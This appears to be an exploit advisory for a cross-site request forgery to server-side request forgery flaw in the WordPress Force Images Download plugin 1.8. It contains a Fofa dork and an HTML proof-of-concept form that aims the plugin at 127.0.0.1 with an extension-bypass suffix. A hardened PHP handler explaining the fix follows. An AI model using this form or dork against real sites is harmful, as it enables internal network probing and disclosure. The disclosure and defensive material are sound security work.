WordPress Force Images Download plugin version 1.8 suffers from a cross site request forgery vulnerability that can enable server-side request forgery attacks.
# Exploit Author : Etharus
# Vulnerability : Cross Site Request Forgery to Server Side Request Forgery
# Impact : internal IP disclosure, file extension bypass, internal port scan.
# Product Vendor : Nazakat Ali
# Version Tested : 1.8
# Date : 14/07/2023
# Fofa Dork : "/wp-content/plugins/wp-force-images-download/"
<form id="wpfid-form" method="post" action="https://target/wp-content/plugins/wp-force-images-download/wpfid.php">
<input name="wpfid_pic_url" type="text" placeholder="[TARGET URL] : http://127.0.0.1/?r=bypass.jpg">
<br><input name="new_name" type="hidden" value="">
<button style="background: gray;" class="d-btn" id="wpfid_button" type="submit" title="Download">
<span style="line-height: 30px;" class="wpfid_title">Download</span>
</button>
</form>
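For comparison, a hardened handler for this request pattern, added here as an example and not the plugin's own code. It assumes it runs inside WordPress (core functions loaded) and keeps the field names from the PoC above; the nonce action name `wpfid_download` and the `upload_files` capability are assumptions.

```php
<?php
// Added example: a defensive version of a "fetch this URL and hand it back" handler.
// Assumes WordPress core is loaded; field names match the PoC form above.

function wpfid_hardened_fetch() {
    // 1. CSRF: require a logged-in user with a capability and a nonce that a
    //    cross-origin form cannot know (emit it with wp_nonce_field('wpfid_download')).
    if ( ! current_user_can( 'upload_files' ) ) {                 // capability is an assumption
        wp_die( 'Insufficient privileges', '', array( 'response' => 403 ) );
    }
    check_admin_referer( 'wpfid_download' );                      // nonce action is an assumption

    $url = isset( $_POST['wpfid_pic_url'] ) ? trim( wp_unslash( $_POST['wpfid_pic_url'] ) ) : '';

    // 2. SSRF: allow only http(s); wp_http_validate_url() rejects loopback and
    //    private ranges (127/8, 10/8, 172.16/12, 192.168/16) and non-standard ports.
    $scheme = wp_parse_url( $url, PHP_URL_SCHEME );
    if ( ! in_array( $scheme, array( 'http', 'https' ), true ) || ! wp_http_validate_url( $url ) ) {
        wp_die( 'Invalid image URL', '', array( 'response' => 400 ) );
    }

    // 3. No redirects: a validated public URL must not be allowed to bounce to an
    //    internal host. Decide "is it an image" by response content type, not by
    //    a ?r=bypass.jpg suffix in the query string.
    $response = wp_remote_get( $url, array( 'timeout' => 10, 'redirection' => 0 ) );
    if ( is_wp_error( $response ) || 200 !== wp_remote_retrieve_response_code( $response ) ) {
        wp_die( 'Fetch failed', '', array( 'response' => 502 ) );
    }
    $ctype   = (string) wp_remote_retrieve_header( $response, 'content-type' );
    $mime    = strtolower( trim( (string) strtok( $ctype, ';' ) ) );
    $allowed = array( 'image/jpeg', 'image/png', 'image/gif', 'image/webp' );
    if ( ! in_array( $mime, $allowed, true ) ) {
        wp_die( 'Not an image', '', array( 'response' => 415 ) );
    }

    // 4. Never let the request choose a path: keep a sanitized basename only.
    $name = isset( $_POST['new_name'] ) ? sanitize_file_name( basename( (string) $_POST['new_name'] ) ) : '';
    if ( '' === $name ) {
        $name = 'image';
    }

    $body = wp_remote_retrieve_body( $response );
    header( 'Content-Type: ' . $mime );
    header( 'Content-Disposition: attachment; filename="' . $name . '"' );
    header( 'Content-Length: ' . strlen( $body ) );
    echo $body;
    exit;
}
```

The nonce check is what removes the CSRF entry point; the URL validation and redirect limit are what remove the SSRF, so both are needed to close the chain the advisory describes.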